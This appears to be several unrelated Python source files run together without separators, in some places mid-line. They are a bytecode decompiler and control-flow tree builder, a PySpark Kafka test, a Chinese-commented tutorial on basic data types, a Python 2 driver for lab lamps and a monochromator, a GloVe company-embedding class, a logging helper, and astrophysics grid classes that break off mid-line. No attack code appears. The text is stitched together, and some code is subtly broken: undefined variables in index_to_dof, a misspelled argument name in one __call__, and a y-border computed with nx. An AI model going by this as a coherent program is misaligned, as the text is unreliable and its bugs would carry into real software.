oparg: 1, 115: lambda oparg: 1, 161: lambda oparg: oparg + 1, 131: lambda oparg: oparg, 141: lambda oparg: oparg + 1, 142: lambda oparg: ((oparg & 0x01) == 0x01) + 1, 132: lambda oparg: ((oparg & 0x08) == 0x08) + ((oparg & 0x04) == 0x04) + ((oparg & 0x02) == 0x02) + ((oparg & 0x01) == 0x01), 133: lambda oparg: (oparg == 3) + 1, 155: lambda oparg: ((oparg & 0x04) == 0x04), } if "unsupported" not in dir(find_n_values_on_stack): find_n_values_on_stack.unsupported = [ # This stuff normally requires reading the stack during runtime 111, 112, 52, 50, 51, 54 ] if "values_needed" not in dir(find_n_values_on_stack): find_n_values_on_stack.values_needed = { 9: lambda oparg: 0, 135: lambda oparg: 0, 124: lambda oparg: 0, 100: lambda oparg: 0, 125: lambda oparg: 1, 1: lambda oparg: 1, 2: lambda oparg: 2, 3: lambda oparg: 3, 6: lambda oparg: 4, 4: lambda oparg: 1, 5: lambda oparg: 2, 10: lambda oparg: 1, 11: lambda oparg: 1, 12: lambda oparg: 1, 15: lambda oparg: 1, 19: lambda oparg: 2, 20: lambda oparg: 2, 16: lambda oparg: 2, 27: lambda oparg: 2, 26: lambda oparg: 2, 22: lambda oparg: 2, 23: lambda oparg: 2, 24: lambda oparg: 2, 25: lambda oparg: 2, 62: lambda oparg: 2, 63: lambda oparg: 2, 64: lambda oparg: 2, 65: lambda oparg: 2, 66: lambda oparg: 2, 145: lambda oparg: 1, 146: lambda oparg: 1, 67: lambda oparg: 2, 57: lambda oparg: 2, 17: lambda oparg: 2, 29: lambda oparg: 2, 28: lambda oparg: 2, 59: lambda oparg: 2, 55: lambda oparg: 2, 56: lambda oparg: 2, 75: lambda oparg: 2, 76: lambda oparg: 2, 77: lambda oparg: 2, 78: lambda oparg: 2, 79: lambda oparg: 2, 60: lambda oparg: 3, 61: lambda oparg: 2, 70: lambda oparg: 1, 130: lambda oparg: oparg, 83: lambda oparg: 1, 50: lambda oparg: 1, 51: lambda oparg: 1, 73: lambda oparg: 1, 72: lambda oparg: 2, 86: lambda oparg: 1, 89: lambda oparg: 3, # 54: lambda oparg: 3 or 4, # stack inspection needed 71: lambda oparg: 0, 90: lambda oparg: 1, 91: lambda oparg: 0, 92: lambda oparg: 1, 94: lambda oparg: 1, 95: lambda oparg: 2, 96: lambda oparg: 1, 97: lambda oparg: 1, 98: lambda oparg: 0, 101: lambda oparg: 0, 116: lambda oparg: 0, 126: lambda oparg: 0, 138: lambda oparg: 0, 148: lambda oparg: 0, 136: lambda oparg: 0, 137: lambda oparg: 1, 157: lambda oparg: oparg, 102: lambda oparg: oparg, 103: lambda oparg: oparg, 104: lambda oparg: oparg, 105: lambda oparg: oparg * 2, 85: lambda oparg: 0, 156: lambda oparg: oparg + 1, 147: lambda oparg: oparg + 2, 106: lambda oparg: 1, 107: lambda oparg: 2, 108: lambda oparg: 2, 84: lambda oparg: 1, 109: lambda oparg: 1, 110: lambda oparg: 0, 114: lambda oparg: 1, 115: lambda oparg: 1, 111: lambda oparg: 1, 112: lambda oparg: 1, 113: lambda oparg: 0, 68: lambda oparg: 1, 69: lambda oparg: 1, 93: lambda oparg: 1, 52: lambda oparg: 1, 160: lambda oparg: 1, 161: lambda oparg: oparg + 2, 131: lambda oparg: oparg + 1, 141: lambda oparg: oparg + 2, 142: lambda oparg: 2 + ((oparg & 0x01) == 0x01), 132: lambda oparg: 1 + ((oparg & 0x08) == 0x08) + ((oparg & 0x04) == 0x04) + ((oparg & 0x02) == 0x02) + ((oparg & 0x01) == 0x01), 133: lambda oparg: 2 + (oparg == 3), 155: lambda oparg: 1 + ((oparg & 0x04) == 0x04), 144: lambda oparg: 0 } values_on_stack = 0 while index >= 0: wants = find_n_values_on_stack.values_needed[codes[index]](codes[index + 1]) if codes[index] in find_n_values_on_stack.grow: values_on_stack += find_n_values_on_stack.grow[codes[index]](codes[index + 1]) elif codes[index] in find_n_values_on_stack.shrink: values_on_stack -= find_n_values_on_stack.shrink[codes[index]](codes[index + 1]) elif codes[index] in find_n_values_on_stack.unsupported: raise NotImplementedError(f"Cannot support {opname[codes[index]]} ({codes[index]}) yet") if values_on_stack >= wants: break index -= 2 return index def build_tree(codes: bytes, start_index: int = 0, stop_index: int = -1) -> Union[Body, Tuple[Body, int]]: main_instructs = Body(list()) data = Segment(list()) def find_contitional(index: int) -> int: # Returns the start index return find_n_values_on_stack(codes, index) def branch(index: int, opcode: int, oparg: int, true_first: bool) -> int: if data.instructions.__len__(): if main_instructs.content.__len__() and isinstance(main_instructs.content[-1], Segment): main_instructs.content[-1].instructions.extend(data.instructions) else: main_instructs.content.append(Segment(data.instructions)) data.instructions = [] split_on = int(find_contitional(index) / 2) values: Segment = main_instructs.content[-1] first_value_index = values.instructions[0].id condition = Segment(values.instructions[split_on - int(first_value_index / 2):int((index - first_value_index) / 2)]) values.instructions = values.instructions[:split_on - int(first_value_index / 2)] if not values.instructions.__len__(): del main_instructs.content[-1] true = build_tree(codes, index + 2, oparg) if isinstance(true, Tuple): true = true[0] if true.content.__len__() and isinstance(true.content[-1], Segment) and true.content[-1].instructions.__len__(): possible_jump: Instruction = true.content[-1].instructions[-1] if (possible_jump.opcode == 113 and possible_jump.oparg == condition[0].id): main_instructs.content.append(While(condition, true, Instruction(codes[index], codes[index + 1], index))) return oparg - index if possible_jump.opcode == 110: false = build_tree(codes, oparg, possible_jump.id + possible_jump.oparg + 2) if isinstance(false, Tuple): false_move = false[1] false = false[0] main_instructs.content.append(Branch(condition, true, false, Instruction(codes[index], codes[index + 1], index), true_first)) return (oparg - index) + false_move main_instructs.content.append(If(condition, true, Instruction(codes[index], codes[index + 1], index), true_first)) return oparg - index def for_iter(index: int, opcode: int, oparg: int) -> int: if len(data.instructions): main_instructs.content.append(Segment(data.instructions)) data.instructions = [] split_on = int(find_contitional(index) / 2) values: Segment = main_instructs.content[-1] first_value_index = values.instructions[0].id condition = values.instructions[split_on - int(first_value_index / 2):int((index - first_value_index) / 2)] values.instructions = values.instructions[:split_on - first_value_index] if not values.instructions.__len__(): del main_instructs.content[-1] loop = build_tree(codes, index + 2, index + 2 + oparg)[0] main_instructs.content.append(For(condition, loop, Instruction(opcode, oparg, index))) return oparg + 2 def jump_forward(index: int, opcode: int, oparg: int) -> int: data.instructions.append(Instruction(opcode, oparg, index)) return oparg def default(index: int, opcode: int, oparg: int) -> int: data.instructions.append(Instruction(opcode, oparg, index)) return 2 def search(index: int) -> int: i = index while index < codes.__len__() and (stop_index == -1 or index < stop_index): opcode, oparg = codes[index:index + 2] if opcode in (114, 115): index += branch(index, opcode, oparg, opcode == 114) elif opcode in (110,): index += jump_forward(index, opcode, oparg) break elif opcode in (93,): index += for_iter(index, opcode, oparg) elif opcode in (83,): index += default(index, opcode, oparg) break else: index += default(index, opcode, oparg) return index - i total_move = search(start_index) if len(data.instructions): main_instructs.content.append(data) if total_move < len(codes): if total_move + 4 == len(codes): instructions = [Instruction(100, 0, total_move), Instruction(83, 0, total_move + 2)] if isinstance(main_instructs.content[-1], Segment): main_instructs.content[-1].instructions.extend(instructions) else: main_instructs.content.append(Segment(instructions)) return main_instructs return (main_instructs, total_move) else: return main_instructs def test(obj: object, display_bytes: bool = False): codes = obj.__code__.co_code if display_bytes: seg = Segment(list()) for i in range(0, len(codes), 2): seg.instructions.append(Instruction(codes[i], codes[i + 1], i)) print(Body([seg]).display()) tree = build_tree(codes) print("\nDISPLAYING TREE\n") try: print(tree.display()) except AttributeError: print("Hit on", tree[1]) print("FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL") print(tree[0].display()) print("FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL FAIL") # Decompiles a CodeType to only its instructions def decompile_instructions_to_str(obj: CodeType) -> str: output_str = "" if hasattr(obj, "co_code"): codes = obj.co_code longest_instruction_name = len(opname[max(codes[::2], key = lambda code: len(opname[code]))]) longest_instruction_code = len(str(max(codes[::2]))) longest_argument = len(str(max(codes[1::2]))) longest_instruction_number = len(str(len(codes))) for i in range(0, len(codes), 2): instruction = codes[i] output_str += f"{i:<{longest_instruction_number}} {instruction:<{longest_instruction_code}} {codes[i + 1]:<{longest_argument}} - {opname[instruction]}" if instruction in (100, 90, 101, 97, 125, 124, 116): output_str += " " * (longest_instruction_name - len(opname[instruction]) + 1) if instruction == 100 and hasattr(obj, "co_consts"): const_load_value = obj.co_consts[codes[i + 1]] if hasattr(const_load_value, "co_code"): const_name = const_load_value.co_name const_type = "Code" else: const_name = str(obj.co_consts[codes[i + 1]]) const_type = type(obj.co_consts[codes[i + 1]]).__name__ output_str += f" {const_name} ({const_type})" elif instruction in (90, 101, 116, 97): names_name = obj.co_names[codes[i + 1]] output_str += f" \"{names_name}\"" elif instruction in (125, 124): names_name = obj.co_varnames[codes[i + 1]] output_str += f" \"{names_name}\"" output_str += "\n" output_str += "\n" return output_str.rstrip("\n") # Decompiles, recursively, a CodeType def decompile_to_str(obj: CodeType, headers = None) -> str: output_str = "" if hasattr(obj, "co_consts"): consts = list(obj.co_consts) if headers is None: next_headers = [obj.co_name] else: next_headers = headers + [obj.co_name] disassemblable = [] for i in range(len(consts)): const = consts[i] if hasattr(const, "co_code"): disassemblable.append(i) consts[i] = f"{const.co_name} (Code)" else: consts[i] = f"{str(const)} ({type(const).__name__})" for i in disassemblable: decompile_to_str(consts[i], next_headers) if hasattr(obj, "co_code"): if type(headers) is not list: output_str += f"Disassemble of: {obj.co_name}\n" else: output_str += "Disassemble of:" + " -> ".join(headers) + f"->{obj.co_name}\n" if len(consts): output_str += "Consts\n\t" + "\n\t".join(consts) + "\n\n" if hasattr(obj, "co_varnames") and len(obj.co_varnames): output_str += "Vars\n\t" + "\n\t".join(obj.co_varnames) + "\n\n" if hasattr(obj, "co_freevars") and len(obj.co_freevars): output_str += "Frees\n\t" + "\n\t".join(obj.co_freevars) + "\n\n" if hasattr(obj, "co_cellvars") and len(obj.co_cellvars): output_str += "Cells\n\t" + "\n\t".join(obj.co_cellvars) + "\n\n" if hasattr(obj, "co_names") and len(obj.co_names): output_str += "Names\n\t" + "\n\t".join(obj.co_names) + "\n\n" output_str += decompile_instructions_to_str(obj) return output_str.rstrip("\n") # Decompiles 'codes' (CodeType's) def decompile(obj: CodeType, /, instructions_only: bool = False) -> str: print(decompile_instructions_to_str(obj) if instructions_only else decompile_to_str(obj)) # Creates a side by side of the code and bytecodes def generate_side_by_side(source_code: List[str], wrap: bool = False) -> str: if wrap: compiled_source = compile("def __anon__():\n\t" + "\n\t".join(source_code), "", "exec") compiled_source = compiled_source.co_consts[0] else: compiled_source = compile("\n".join(source_code), "", "exec") decompiled = decompile_instructions_to_str(compiled_source).split("\n") longest_source_code_line = len(max(source_code, key = lambda code: len(code))) + 1 output_str = "" i = 0 for src_code_line, decompiled_line in zip(source_code, decompiled): output_str += f"{src_code_line:<{longest_source_code_line}}# {decompiled_line}\n" i += 1 if i < len(decompiled): while i < len(decompiled): output_str += f"{' ':<{longest_source_code_line}}# {decompiled[i]}\n" i += 1 elif i < len(source_code): while i < len(source_code): output_str += f"{source_code[i]}\n" i += 1 return output_str.rstrip() if __name__ == "__main__": def test_1(): a = 100 if not a >= 50: return 1 else: return 2 def test_2(): a = 100 b = 200 if a >= 50: if b >= 150: return 1 else: return 2 else: return 3 def test_3(): a = 50 b = 100 if a >= 25: return 1 elif a >= 50: return 2 elif b >= 125: return 3 elif b >= 100: return 4 else: return 5 def test_4(): a = 500 b = 300 if a >= 500: if b >= 800: return 0 elif b >= 200: return 1 else: return 2 elif a >= 300: if b >= 800: return 3 elif b >= 200: return 4 else: return 5 else: if b >= 800: return 6 elif b >= 200: return 7 else: return 8 def test_5(): a = 1 b = 2 if a > 3 or b < 4: return 1 else: return 2 def test_6(): pass def test_7(values: List): total = 0 for i in values: total += i return total def test_8(): total = 0 for i in range(8): total += i return total def test_9(): total = 0 i = 0 while i < 10: i += 1 total += i while i < 10: i += 1 total += i return total def test_10(values: List): total = 0 for i in values: for j in values: for l in values: total += l total += j total += i return total def test_11(): a = 50 if a >= 25: a = 100 # Will have return or jump instruction if there's an else/elif else: a = 200 if a >= 50: a = 200 if a >= 75: a = 200 a = 300 else: a = 400 a = 500 return a def test_12(): def test_12_internal(): b = 20 if b > 5: b = 50 while b > 90: b -= 2 return b a = 60 c = 20 our_b = test_12_internal() if a == c or (our_b == 2 and our_b == 3): return 2 test(test_12, True)OMR5221/spark_delta_dockerpyspark_examples/kafka_stream_test.py # Subscribe to 1 topic from pyspark.sql import SparkSession spark = SparkSession.builder.appName("stream").getOrCreate() dsraw = spark.readStream.format("kafka").option("kafka.bootstrap.servers", "localhost:9092").option("subscribe", "queueing.transactions").load() ds = dsraw.selectExpr("CAST(key AS STRING)") print(type(dsraw)) print(type(ds)) rawQuery = dsraw \ .writeStream \ .queryName("qraw")\ .format("memory")\ .start() raw = spark.sql("select * from qraw") raw.show() #!/usr/bin/env python # -*- coding:utf-8 -*- # List Weekday = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday'] print(Weekday[0]) ## List正负索引的使用 periodic_table = ['H','He','Li','Be','B','C','N','O','F','Ne'] print(periodic_table[0]) print(periodic_table[-2]) print(periodic_table[0:3]) print(periodic_table[-10:-7]) print(periodic_table[-10:]) print(periodic_table[:9]) # 字典Dictonary ## 字典的特征 # 1. 字典中数据必须是以键值对的形式出现的 # 2. 逻辑上讲,键是不能重复的,而值可以重复 # 3. 字典中的键(key)是不可改变的,也就是无法修改的;而值(value),是可改变的,可修改的,可以是任何对象 # 注意:字典不能够进行切片 NASDAQ_CODE = { 'BIDU': 'Baidu', 'SINA':'Sina', 'YOKU': 'Youku' } print(NASDAQ_CODE) a = {'key' : 123, 'key' : 123} print(a) NASDAQ_CODE.update({'FB': 'FaceBook', 'TSLA': 'Tesla'}) print(NASDAQ_CODE) del NASDAQ_CODE['FB'] print(NASDAQ_CODE) ## 元组 letters = ('a', 'b', 'c', 'd', 'e', 'f', 'g') print(letters[0]) # 集合 a_set = {1,2,3,4} a_set.add(5) a_set.discard(5) print(a_set)#!/usr/bin/python import pyNetIO as lower_IO import time from General_tools import * SCALA_root = "/home/scala1/SCALA/" INPUT_data = SCALA_root+"SCALA_library/INPUTS/" ######################### # --------------------- # # - TEST & CONNEXION - # # --------------------- # ######################### def Status_Test(Bool, message=""): """ """ print "".center(70,"*") if Bool: print "Status - Ok" print message else: print "Status - Problem" print message print "".center(70,"*") ######################### # --------------------- # # - SCALA - # # --------------------- # ######################### Error_status_Scala = 1 SCALA_max_loading_time = 30 # in second SCALA_channel = "0" SCALA_fclass = "000" SCALA_xfclass = "000" SCALA_prod = "00-00" def assign_prod_name(): """ """ loc = time.localtime() year = str(loc.tm_year)[-2:] day = str(loc.tm_yday) obsnum = '001' runnum = '001' savefile= "Default_SCALA_fitsfile" #savefile = "%s_%s_%s_%s_%d_%s_%s_00-000.fits"%(year,day,obsnum,runnum, # SCALA_channel,SCALA_fclass,SCALA_xfclass, # ) return savefile ######################### # --------------------- # # - MONOCHROMATOR - # # --------------------- # ######################### Error_status_Mono = 2 SCALA_COMPUTER_IP = "172.16.58.3"#"192.168.127.12" SCALA_netmask = "255.255.255.224" # ------------------- # # - Serial_function - # # ------------------- # Serial_port = '/dev/ttyUSB0' # windows: 'COMx', Linux: '/dev/' Serial_baud = 9600 # -- Times took by _load_current_status_ -- # IO_timer_max_loading = 20 # in Second ######################### # --------------------- # # - CLAPS - # # --------------------- # ######################### Error_status_clap = 3 IO_timer_max_loading_Clap = 20 # ------------------- # # - Earth location - # # ------------------- # Line_frequency = 60 # must be 50/60 in the EU/US ######################### # --------------------- # # - Lamp Switch - # # --------------------- # ######################### Error_status_Xe = 5 Error_status_Halo = 6 Serial_port_lampSwitch = '/dev/ttyACM0' baud_lampSwtich = 9600 ######################### # --------------------- # # - NET I/O - # # --------------------- # ######################### Error_status_NetIO = 6 switch_max_time = 5 NET_IO_port = '/dev/ttyUSB1' NET_IO_port_backup = '/dev/ttyUSB2' NET_IO_order= 'MonoChromator,XeLamp,HaloLamp,Claps' class IO_scala(lower_IO.NetIO): """ """ def __init__(self,SerPort=None,verbose=True): """ """ if SerPort is None: SerPort = NET_IO_port lower_IO.NetIO.__init__(self,SerPort=SerPort,SerPort_backup=NET_IO_port_backup) self.verbose= verbose ########################################### # MonoChromator # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_MonoChrometor_on(self): """ """ print "Is Mono On ?" if self.GetPortList()[0] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[0] == "1": return True return False @timeout(switch_max_time,Error_status_NetIO) def switch_MonoChrometor_on(self,wait_for_it=False): """ """ if self.Is_MonoChrometor_on(): return "Was on" if self.SetPortState(PortNr=1, State=1) == "OK": if self.verbose: print "SCALA.IO : The MonoChromator supply is On. Please wait 3 second for it to wake up" if wait_for_it: time.sleep(3) @timeout(switch_max_time,Error_status_NetIO) def switch_MonoChrometor_off(self): """ """ if self.Is_MonoChrometor_on(): if self.SetPortState(PortNr=1, State=0) == "OK": if self.verbose: print "SCALA.IO : The MonoChromator supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the MonoChromator" ) else: if self.verbose: print "SCALA.IO : The MonoChromator was already Off" ########################################### # Xenon Lamp # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_XeLamp_on(self): """ """ print "Is XeLamp On ?" if self.GetPortList()[1] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[1] == "1": return True return False @timeout(switch_max_time,Error_status_NetIO) def switch_XeLamp_on(self): """ """ if self.Is_XeLamp_on(): return "Was on" if self.SetPortState(PortNr=2, State=1) == "OK": if self.verbose: print "SCALA.IO : The XeLamp supply is On. You should wait for the lamp to warm up (not forced here)" @timeout(switch_max_time,Error_status_NetIO) def switch_XeLamp_off(self): """ """ if self.Is_XeLamp_on(): if self.SetPortState(PortNr=2, State=0) == "OK": if self.verbose: print "SCALA.IO : The Xenon Lamp supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the Xenon Lamp" ) else: if self.verbose: print "SCALA.IO : The Xenon Lamp was already Off" ########################################### # Halogen Lamp # ########################################### @timeout(switch_max_time,Error_status_NetIO) def Is_HaloLamp_on(self): """ """ print "Is Halo On ?" if self.GetPortList()[2] == "1": return True time.sleep(0.2) # Sometimes they False negatives happend if self.GetPortList()[2] == "1": return True return False def switch_HaloLamp_on(self): """ """ try: self._switch_HaloLamp_on_() except: try: [self.GetPortList() for i in range(3)] self.SetPortList('1111') except: sys.exit(Error_status_NetIO) def switch_HaloLamp_off(self): """ """ try: self._switch_HaloLamp_off_() except: try: [self.GetPortList() for i in range(3)] self.SetPortList('1101') except: sys.exit(Error_status_NetIO) @timeout(switch_max_time,Error_status_NetIO) def _switch_HaloLamp_on_(self): """ """ if self.Is_HaloLamp_on(): return "Was on" if self.SetPortState(PortNr=3, State=1) == "OK": if self.verbose: print "SCALA.IO : The Halo Lamp supply is On. You should wait for the lamp to warm up (not forced here)" @timeout(switch_max_time*2,Error_status_NetIO) def _switch_HaloLamp_off_(self,try_again=True): """ """ if self.Is_HaloLamp_on(): if self.SetPortState(PortNr=3, State=0) == "OK": if self.verbose: print "SCALA.IO : The Halo Lamp supply is now Off" else: try: time.sleep(2) self.switch_HaloLamp_off(try_again=False) except: raise ValueError("SCALA.IO : I've *FAILED* switching off the Halo Lamp" ) else: if self.verbose: print "SCALA.IO : The Halo Lamp was already Off" ########################################### # CLAPS # ########################################### @timeout(switch_max_time*3,Error_status_NetIO) def Is_CLAPS_on(self,try_again=True): """ """ print "Is Clap On ?" if self.GetPortList()[3] == "1": return True # Sometimes they False negatives happend time.sleep(0.2) if self.GetPortList()[3] == "1": return True time.sleep(1) self.GetPortList() self.Is_CLAPS_on(try_again=False) return False @timeout(switch_max_time,Error_status_NetIO) def switch_CLAPS_on(self): """ """ if self.Is_CLAPS_on(): return "Was on" if self.SetPortState(PortNr=4, State=1) == "OK": if self.verbose: print "SCALA.IO : The CLAPS supply is now On. Ready to go" @timeout(switch_max_time,Error_status_NetIO) def switch_CLAPS_off(self): """ """ if self.Is_CLAPS_on(): if self.SetPortState(PortNr=4, State=0) == "OK": if self.verbose: print "SCALA.IO : The CLAPS supply is now Off" else: raise ValueError("SCALA.IO : I've *FAILED* switching off the CLAPS" ) else: if self.verbose: print "SCALA.IO : The CLAPS were already Off" # ------------------------ # """This module generates company embeddings given company data and pre-trained word embeddings""" import csv from collections import defaultdict import numpy as np class Embeddings: """ Helper class for embeddings """ def __init__(self): self.embeddings = self.read_glove_embeddings() self.embedding_size = len(self.embeddings['the']) @classmethod def read_glove_embeddings(cls): """ Class method to read in embeddings :return: embeddings: dictionary of embeddings, key:word, value:embedding """ embeddings = defaultdict(list) with open('app/data/glove.6B.50d.txt', encoding="utf-8") as csvfile: spamreader = csv.reader(csvfile, delimiter=' ', quoting=csv.QUOTE_NONE) for row in spamreader: embeddings[row[0]] = row[1:] return embeddings def create_single_embedding(self, company_data): """ Create single embedding for company :param company_name: company name string :return: company_embedding: embedding for single company, numpy array """ # # reading company text # scrape_file_location = 'app/scrape_output/' + company_name + '.json' # with open(scrape_file_location) as json_file: # data = json.load(json_file) company_text = ' '.join([ent['company_text'] for ent in company_data]) # generate embedding num_words = 0 company_embedding = np.zeros(shape=(1, self.embedding_size), dtype=np.float32) for word in company_text.split(): try: company_embedding += np.array(self.embeddings[word], dtype=np.float32) num_words += 1 except ValueError: continue # normalize array company_embedding_arr = company_embedding * (1/num_words) company_embedding_lst = company_embedding_arr.tolist()[0] # # remove scraped file # os.remove(scrape_file_location) return company_embedding_lst from .Console_Color import * from datetime import datetime class Printer: @staticmethod def _dolog(text): today = datetime.now().strftime("%d/%m/%Y %H:%M:%S") try: with open("log.txt","r") as f: log_txt = f.read() except: log_txt = "" with open("log.txt","w") as f: f.write(log_txt+"\n["+today+"]"+text) @staticmethod def stext(text): color = Console_Color("text").color print(color, text) @staticmethod def warning(text): color = Console_Color("warning").color print(color, "[Warning]", text) Printer.stext("") @staticmethod def error(text): color = Console_Color("error").color print(color, "[Error]", text) Printer.stext("") @staticmethod def log(text): #color = Console_Color("log").color Printer._dolog("[Log] "+str(text)) @staticmethod def info(text): #color = Console_Color("info").color Printer._dolog("[Info] "+str(text))# -*- coding: utf-8 -*- from numpy import * from mab.gd.gdfast import * import mab.gd.gdfast import pyublas import mab.gd.logging as logging logger = logging.getLogger("gd.schw.grid") class Grid2I_Block_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, dither=1, _issubgrid=False): self.light_model = light_model self.profile_model = profile_model self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) self.n_I1 = n_I1 self.n_I2 = n_I2 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) epsilon = 0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.dof_per_cell = 1 self.dof = self.n_orbits if not _issubgrid: self.subgrid = Grid2I_Block_Inside(light_model, profile_model, logrmin, logrmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v): return 1 def index_to_dof(self, xi, yi, i): return i1*self.n_I2 + i2 def solve_coordinates(self, inner_products): # system is orthogonal, so inner products are the coordinates themselves return inner_products * 1.0 def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1*self.n_I2 + i2 def __call__(self, coordinates, logr, l): return self.mesh.eval(coorinates, logr, l) class Grid2I_Shaped_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, dither=1, order=0, _issubgrid=False, circular=False): self.light_model = light_model self.profile_model = profile_model self.umin = self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.umax = self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) #import pdb #pdb.set_trace() logger.debug("rmin: %s kpc rmax: %s kpc" % (light_model.arcsec_to_kpc(10**logrmin), light_model.arcsec_to_kpc(10**logrmax))) self.n_I1 = n_I1 self.n_I2 = n_I2 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.rs = 10**self.logrs self.r_borders = 10**self.logr_borders if circular: self.Es = array([profile_model.vcirc(r)**2/2 + profile_model.potentialr(r) for r in 10**self.logrs]) self.E_borders = array([profile_model.vcirc(r)**2/2 + profile_model.potentialr(r) for r in 10**self.logr_borders]) #import pdb; #pdb.set_trace() else: self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) #print "Es", self.Es epsilon = 0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.n_cells = self.n_orbits self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None #self.xmin self.I1s = self.logrs self.I2s = self.ls if not _issubgrid: self.subgrid = Grid2I_Shaped_Inside(light_model, profile_model, logrmin, logrmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True, circular=circular) else: self.subgrid = None def get_dof(self): return self.mesh.get_dof() def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1 + i2 *self.n_I1 # + i2 class Grid2d_Shaped_Inside(object): def __init__(self, xmin, xmax, ymin, ymax, nx, ny, dither=1, order=0, _issubgrid=False): self.xmin = xmin self.xmax = xmax self.ymin = ymin self.ymax = ymax self.nx = nx self.ny = ny self.resize = (self.xmin, self.ymin), (self.xmax, self.ymax) self.x = (arange(0, nx,dtype=float)+0.5) / (nx) * (self.xmax-self.xmin) + self.xmin self.x_borders = (arange(0, nx+1,dtype=float)) / (nx) * (self.xmax-self.xmin) + self.xmin self.y = (arange(0, ny, dtype=float)+0.5) / (ny) * (self.ymax-self.ymin) + self.ymin self.y_borders = (arange(0, ny+1, dtype=float)) / (nx) * (self.ymax-self.ymin) + self.ymin self.dither = dither self.n = self.nx * self.ny self.n_cells = self.n self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.xmin, self.ymin, self.xmax, self.ymax, self.nx, self.ny) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None if not _issubgrid: self.subgrid = Grid2d_Shaped_Inside(xmin, xmax, ymin, ymax, nx*dither, ny*dither, dither=1, _issubgrid=True) else: self.subgrid = None def get_dof(self): return self.mesh.get_dof() def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) #def index_to_orbitnr(self, i1, i2, i3): # assert i3 == 0 # return i1 + i2 *self.n_I1 # + i2 class Grid2I_Shaped_InsideTest(object): def __init__(self, light_model, profile_model, rmin, rmax, n_I1, n_I2, dither=1, order=0, _issubgrid=False): self.light_model = light_model self.profile_model = profile_model #self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) #self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) scale = 2 self.umin = arctan(rmin*scale) self.umax = arctan(rmax*scale) self.n_I1 = n_I1 self.n_I2 = n_I2 #self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin #self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin us = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.umax-self.umin) + self.umin uborders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.umax-self.umin) + self.umin self.rs = rs = tan(us)/scale self.r_borders = r_borders = 